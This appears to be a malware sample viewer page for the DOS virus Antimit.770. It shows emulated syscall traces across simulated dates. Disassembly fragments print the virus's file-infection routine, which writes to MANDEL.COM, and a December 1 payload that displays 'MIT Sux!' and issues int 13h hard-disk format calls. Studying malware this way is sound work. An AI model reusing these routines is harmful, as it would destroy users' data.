Sample viewer

vx.netlux.org/Virus.DOS.Antimit.770

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T21:54:39.372350944Z	25	PC: 12a5c \| Get default drive
2018-12-17T21:54:39.373891514Z	14	PC: 12a62 \| Set default drive (Drive = 'Õ')
2018-12-17T21:54:39.375108527Z	42	PC: 12a97 \| Get date 0x12a97: cmp dh, 0xc 0x12a9a: jne 0x12ac2 0x12a9c: cmp dl, 1 0x12a9f: jne 0x12ac2 0x12aa1: mov dx, 0x12a 0x12aa4: mov ah, 9 0x12aa6: int 0x21 0x12aa8: mov ah, 5 0x12aaa: mov al, 2 0x12aac: mov ch, 0 0x12aae: mov dh, 0 0x12ab0: mov dl, 0x80 0x12ab2: int 0x13 0x12ab4: mov ah, 6 0x12ab6: int 0x13 0x12ab8: mov ah, 5 0x12aba: mov dl, 0 0x12abc: int 0x13 0x12abe: mov ah, 0x4c 0x12ac0: int 0x21
2018-12-17T21:54:39.37742286Z	53	PC: 12ad4 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:39.379251893Z	37	PC: 12ae5 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:39.380392982Z	26	PC: 12af2 \| Set disk transfer address
2018-12-17T21:54:39.381501738Z	78	PC: 12afc \| Find first file
2018-12-17T21:54:39.387997352Z	79	PC: 12b22 \| Find next file
2018-12-17T21:54:39.391071585Z	79	PC: 12b22 \| Find next file
2018-12-17T21:54:39.394088031Z	79	PC: 12b22 \| Find next file
2018-12-17T21:54:39.397728718Z	79	PC: 12b22 \| Find next file
2018-12-17T21:54:39.400643758Z	79	PC: 12b22 \| Find next file
2018-12-17T21:54:39.403252393Z	67	PC: 12b49 \| Get or set file attributes
2018-12-17T21:54:39.406850054Z	67	PC: 12b53 \| Get or set file attributes
2018-12-17T21:54:39.421687505Z	61	PC: 12b58 \| Open file (Filename = 'MANDEL.COM')
2018-12-17T21:54:39.426001824Z	87	PC: 12b61 \| Get or set file date and time
2018-12-17T21:54:39.427004196Z	63	PC: 12b73 \| Read file or device (Read 479 bytes on handle 5)
2018-12-17T21:54:39.433249573Z	66	PC: 12b84 \| Move file pointer
2018-12-17T21:54:39.434674709Z	64	PC: 12b95 \| Write file or device (Write 291 bytes on handle 5)
2018-12-17T21:54:39.442958025Z	64	PC: 12ba6 \| Write file or device (Write 479 bytes on handle 5)
2018-12-17T21:54:39.450724887Z	66	PC: 12bb7 \| Move file pointer
2018-12-17T21:54:39.452216834Z	44	PC: 12bbd \| Get time 0x12bbd: mov byte ptr [0x107], dh 0x12bc1: call 0x22a48 0x12bc4: mov ah, 0x40 0x12bc6: mov dx, 0x100 0x12bc9: mov cx, 0x1df 0x12bcc: int 0x21 0x12bce: jb 0x12c12 0x12bd0: cmp ax, 0x1df 0x12bd3: jne 0x12c12 0x12bd5: jmp 0x12be3 0x12bd7: nop 0x12bd8: mov al, 0 0x12bda: iret 0x12bdb: sub byte ptr [di + 0x4d88], cl 0x12bdf: push bp 0x12be0: add word ptr [bx + 0x11], dx 0x12be3: mov ax, 0x5701 0x12be6: mov cx, word ptr [0x29b] 0x12bea: mov dx, word ptr [0x29d] 0x12bee: and cl, 0xe0
2018-12-17T21:54:39.454379115Z	25	PC: 12a5c \| Get default drive
2018-12-17T21:54:39.455447574Z	14	PC: 12a62 \| Set default drive (Drive = '')
2018-12-17T21:54:39.466071387Z	64	PC: 12bce \| Write file or device (Write 479 bytes on handle 5)
2018-12-17T21:54:39.47272444Z	87	PC: 12bf6 \| Get or set file date and time
2018-12-17T21:54:39.474223307Z	62	PC: 12bfa \| Close file
2018-12-17T21:54:39.482419226Z	26	PC: 12c01 \| Set disk transfer address
2018-12-17T21:54:39.483495454Z	37	PC: 12c11 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T21:54:39.485185228Z	76	PC: 12c51 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":504,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:40:59.747015303Z	25	PC: 12a5c \| Get default drive
2018-12-25T11:40:59.749340697Z	14	PC: 12a62 \| Set default drive (Drive = 'Õ')
2018-12-25T11:40:59.750442597Z	42	PC: 12a97 \| Get date 0x12a97: cmp dh, 0xc 0x12a9a: jne 0x12ac2 0x12a9c: cmp dl, 1 0x12a9f: jne 0x12ac2 0x12aa1: mov dx, 0x12a 0x12aa4: mov ah, 9 0x12aa6: int 0x21 0x12aa8: mov ah, 5 0x12aaa: mov al, 2 0x12aac: mov ch, 0 0x12aae: mov dh, 0 0x12ab0: mov dl, 0x80 0x12ab2: int 0x13 0x12ab4: mov ah, 6 0x12ab6: int 0x13 0x12ab8: mov ah, 5 0x12aba: mov dl, 0 0x12abc: int 0x13 0x12abe: mov ah, 0x4c 0x12ac0: int 0x21
2018-12-25T11:40:59.752456778Z	9	PC: 12aa8 \| Display string (String= 'MIT Sux! ')
2018-12-25T11:40:59.75831203Z	76	PC: 12ac2 \| Terminate with return code (Return code = '2')

{"DateBased":true,"Day":2,"Month":12,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":504,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:41:02.075946855Z	25	PC: 12a5c \| Get default drive
2018-12-25T11:41:02.077557566Z	14	PC: 12a62 \| Set default drive (Drive = 'Õ')
2018-12-25T11:41:02.078723606Z	42	PC: 12a97 \| Get date 0x12a97: cmp dh, 0xc 0x12a9a: jne 0x12ac2 0x12a9c: cmp dl, 1 0x12a9f: jne 0x12ac2 0x12aa1: mov dx, 0x12a 0x12aa4: mov ah, 9 0x12aa6: int 0x21 0x12aa8: mov ah, 5 0x12aaa: mov al, 2 0x12aac: mov ch, 0 0x12aae: mov dh, 0 0x12ab0: mov dl, 0x80 0x12ab2: int 0x13 0x12ab4: mov ah, 6 0x12ab6: int 0x13 0x12ab8: mov ah, 5 0x12aba: mov dl, 0 0x12abc: int 0x13 0x12abe: mov ah, 0x4c 0x12ac0: int 0x21
2018-12-25T11:41:02.080746526Z	53	PC: 12ad4 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:02.083594917Z	37	PC: 12ae5 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:02.084642797Z	26	PC: 12af2 \| Set disk transfer address
2018-12-25T11:41:02.085620736Z	78	PC: 12afc \| Find first file
2018-12-25T11:41:02.092309544Z	79	PC: 12b22 \| Find next file
2018-12-25T11:41:02.096507266Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.099308937Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.102000697Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.105725477Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.108508298Z	67	PC: 12b49 \| Get or set file attributes
2018-12-25T11:41:02.114145519Z	67	PC: 12b53 \| Get or set file attributes
2018-12-25T11:41:02.130619219Z	61	PC: 12b58 \| Open file (Filename = 'MANDEL.COM')
2018-12-25T11:41:02.137373352Z	87	PC: 12b61 \| Get or set file date and time
2018-12-25T11:41:02.139494492Z	63	PC: 12b73 \| Read file or device (Read 479 bytes on handle 5)
2018-12-25T11:41:02.146139755Z	66	PC: 12b84 \| Move file pointer
2018-12-25T11:41:02.147157621Z	64	PC: 12b95 \| Write file or device (Write 291 bytes on handle 5)
2018-12-25T11:41:02.152428409Z	64	PC: 12ba6 \| Write file or device (Write 479 bytes on handle 5)
2018-12-25T11:41:02.157970894Z	66	PC: 12bb7 \| Move file pointer
2018-12-25T11:41:02.159066501Z	44	PC: 12bbd \| Get time 0x12bbd: mov byte ptr [0x107], dh 0x12bc1: call 0x22a48 0x12bc4: mov ah, 0x40 0x12bc6: mov dx, 0x100 0x12bc9: mov cx, 0x1df 0x12bcc: int 0x21 0x12bce: jb 0x12c12 0x12bd0: cmp ax, 0x1df 0x12bd3: jne 0x12c12 0x12bd5: jmp 0x12be3 0x12bd7: nop 0x12bd8: mov al, 0 0x12bda: iret 0x12bdb: sub byte ptr [di + 0x4d88], cl 0x12bdf: push bp 0x12be0: add word ptr [bx + 0x11], dx 0x12be3: mov ax, 0x5701 0x12be6: mov cx, word ptr [0x29b] 0x12bea: mov dx, word ptr [0x29d] 0x12bee: and cl, 0xe0
2018-12-25T11:41:02.16058912Z	25	PC: 12a5c \| Get default drive (See above)
2018-12-25T11:41:02.161815936Z	14	PC: 12a62 \| Set default drive (See above)
2018-12-25T11:41:02.175327141Z	64	PC: 12bce \| Write file or device (Write 479 bytes on handle 5)
2018-12-25T11:41:02.181714893Z	87	PC: 12bf6 \| Get or set file date and time
2018-12-25T11:41:02.183228292Z	62	PC: 12bfa \| Close file
2018-12-25T11:41:02.190824857Z	26	PC: 12c01 \| Set disk transfer address
2018-12-25T11:41:02.191715208Z	37	PC: 12c11 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:02.193481756Z	76	PC: 12c51 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":504,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:41:02.90280996Z	25	PC: 12a5c \| Get default drive
2018-12-25T11:41:02.904688703Z	14	PC: 12a62 \| Set default drive (Drive = 'Õ')
2018-12-25T11:41:02.906008589Z	42	PC: 12a97 \| Get date 0x12a97: cmp dh, 0xc 0x12a9a: jne 0x12ac2 0x12a9c: cmp dl, 1 0x12a9f: jne 0x12ac2 0x12aa1: mov dx, 0x12a 0x12aa4: mov ah, 9 0x12aa6: int 0x21 0x12aa8: mov ah, 5 0x12aaa: mov al, 2 0x12aac: mov ch, 0 0x12aae: mov dh, 0 0x12ab0: mov dl, 0x80 0x12ab2: int 0x13 0x12ab4: mov ah, 6 0x12ab6: int 0x13 0x12ab8: mov ah, 5 0x12aba: mov dl, 0 0x12abc: int 0x13 0x12abe: mov ah, 0x4c 0x12ac0: int 0x21
2018-12-25T11:41:02.908168012Z	53	PC: 12ad4 \| Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:02.909929186Z	37	PC: 12ae5 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:02.911006046Z	26	PC: 12af2 \| Set disk transfer address
2018-12-25T11:41:02.912042882Z	78	PC: 12afc \| Find first file
2018-12-25T11:41:02.918193092Z	79	PC: 12b22 \| Find next file
2018-12-25T11:41:02.920668827Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.922998315Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.925560971Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.928652762Z	79	PC: 12b22 \| Find next file (See above)
2018-12-25T11:41:02.931109859Z	67	PC: 12b49 \| Get or set file attributes
2018-12-25T11:41:02.937347161Z	67	PC: 12b53 \| Get or set file attributes
2018-12-25T11:41:02.954329111Z	61	PC: 12b58 \| Open file (Filename = 'MANDEL.COM')
2018-12-25T11:41:02.961335481Z	87	PC: 12b61 \| Get or set file date and time
2018-12-25T11:41:02.963145806Z	63	PC: 12b73 \| Read file or device (Read 479 bytes on handle 5)
2018-12-25T11:41:02.970660734Z	66	PC: 12b84 \| Move file pointer
2018-12-25T11:41:02.972452979Z	64	PC: 12b95 \| Write file or device (Write 291 bytes on handle 5)
2018-12-25T11:41:02.980819718Z	64	PC: 12ba6 \| Write file or device (Write 479 bytes on handle 5)
2018-12-25T11:41:02.990221504Z	66	PC: 12bb7 \| Move file pointer
2018-12-25T11:41:02.992570103Z	44	PC: 12bbd \| Get time 0x12bbd: mov byte ptr [0x107], dh 0x12bc1: call 0x22a48 0x12bc4: mov ah, 0x40 0x12bc6: mov dx, 0x100 0x12bc9: mov cx, 0x1df 0x12bcc: int 0x21 0x12bce: jb 0x12c12 0x12bd0: cmp ax, 0x1df 0x12bd3: jne 0x12c12 0x12bd5: jmp 0x12be3 0x12bd7: nop 0x12bd8: mov al, 0 0x12bda: iret 0x12bdb: sub byte ptr [di + 0x4d88], cl 0x12bdf: push bp 0x12be0: add word ptr [bx + 0x11], dx 0x12be3: mov ax, 0x5701 0x12be6: mov cx, word ptr [0x29b] 0x12bea: mov dx, word ptr [0x29d] 0x12bee: and cl, 0xe0
2018-12-25T11:41:02.995924293Z	25	PC: 12a5c \| Get default drive (See above)
2018-12-25T11:41:02.997909431Z	14	PC: 12a62 \| Set default drive (See above)
2018-12-25T11:41:02.999991555Z	64	PC: 12bce \| Write file or device (Write 479 bytes on handle 5)
2018-12-25T11:41:03.006714015Z	87	PC: 12bf6 \| Get or set file date and time
2018-12-25T11:41:03.00877986Z	62	PC: 12bfa \| Close file
2018-12-25T11:41:03.016703053Z	26	PC: 12c01 \| Set disk transfer address
2018-12-25T11:41:03.017779153Z	37	PC: 12c11 \| Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:41:03.020162964Z	76	PC: 12c51 \| Terminate with return code (Return code = '0')